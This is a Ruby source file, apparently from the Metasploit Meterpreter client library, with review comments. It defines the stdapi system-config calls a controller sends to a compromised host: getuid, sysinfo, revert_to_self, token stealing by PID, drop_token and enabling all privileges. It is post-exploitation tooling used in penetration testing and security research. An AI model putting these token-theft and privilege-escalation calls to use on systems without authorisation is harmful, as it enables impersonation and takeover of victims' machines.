#!/usr/bin/env ruby
# -*- coding: binary -*-
require 'rex/post/process'
require 'rex/post/meterpreter/packet'
require 'rex/post/meterpreter/client'
require 'rex/post/meterpreter/extensions/stdapi/constants'
require 'rex/post/meterpreter/extensions/stdapi/stdapi'
module Rex
module Post
module Meterpreter
module Extensions
module Stdapi
module Sys
###
#
# This class provides access to remote system configuration and information.
#
###
class Config

  #
  # Stores the client object that every request in this class is sent
  # through.
  #
  def initialize(client)
    self.client = client
  end

  #
  # Asks the remote side which user it is running as. The name taken from
  # the response is passed through the client's unicode_filter_encode
  # before it is returned.
  #
  def getuid
    packet = Packet.create_request('stdapi_sys_config_getuid')
    reply = client.send_request(packet)
    user_name = reply.get_tlv_value(TLV_TYPE_USER_NAME)

    client.unicode_filter_encode(user_name)
  end

  #
  # Requests information about the remote computer and returns it as a
  # hash keyed by 'Computer', 'OS', 'Architecture' and 'System Language'.
  #
  # NOTE(review): unlike getuid, these values are returned exactly as
  # get_tlv_value hands them back (no unicode_filter_encode). They originate
  # on the remote side, so callers that print or log them should treat them
  # as untrusted input.
  #
  def sysinfo
    packet = Packet.create_request('stdapi_sys_config_sysinfo')
    reply = client.send_request(packet)

    # Result key paired with the TLV type it is read from, in result order.
    fields = [
      ['Computer', TLV_TYPE_COMPUTER_NAME],
      ['OS', TLV_TYPE_OS_NAME],
      ['Architecture', TLV_TYPE_ARCHITECTURE],
      ['System Language', TLV_TYPE_LANG_SYSTEM]
    ]

    info = {}
    fields.each do |label, tlv_type|
      info[label] = reply.get_tlv_value(tlv_type)
    end
    info
  end

  #
  # Sends the request that calls RevertToSelf on the remote machine and
  # returns whatever send_request returns for it.
  #
  def revert_to_self
    packet = Packet.create_request('stdapi_sys_config_rev2self')
    client.send_request(packet)
  end

  #
  # Sends a steal-token request for the process identified by +pid+ and
  # returns the user name found in the response, filtered through
  # unicode_filter_encode.
  #
  # The pid is coerced with to_i before it is sent, so a value with no
  # leading digits (or nil) goes out as 0.
  # NOTE(review): callers may want to validate the pid before calling.
  #
  def steal_token(pid)
    packet = Packet.create_request('stdapi_sys_config_steal_token')
    packet.add_tlv(TLV_TYPE_PID, pid.to_i)

    reply = client.send_request(packet)
    user_name = reply.get_tlv_value(TLV_TYPE_USER_NAME)
    client.unicode_filter_encode(user_name)
  end

  #
  # Sends a drop-token request (drops any assumed token) and returns the
  # user name found in the response, filtered through
  # unicode_filter_encode.
  #
  def drop_token
    packet = Packet.create_request('stdapi_sys_config_drop_token')

    reply = client.send_request(packet)
    user_name = reply.get_tlv_value(TLV_TYPE_USER_NAME)
    client.unicode_filter_encode(user_name)
  end

  #
  # Sends the getprivs request (enables all possible privileges) and
  # returns an array holding the value of each TLV_TYPE_PRIVILEGE entry in
  # the response, in the order the response yields them.
  #
  def getprivs
    packet = Packet.create_request('stdapi_sys_config_getprivs')
    privileges = []

    reply = client.send_request(packet)
    reply.each(TLV_TYPE_PRIVILEGE) { |tlv| privileges << tlv.value }

    privileges
  end

protected

  # Client used to send requests; readable and writable only from within
  # instances of this class hierarchy.
  attr_accessor :client

end
end; end; end; end; end; end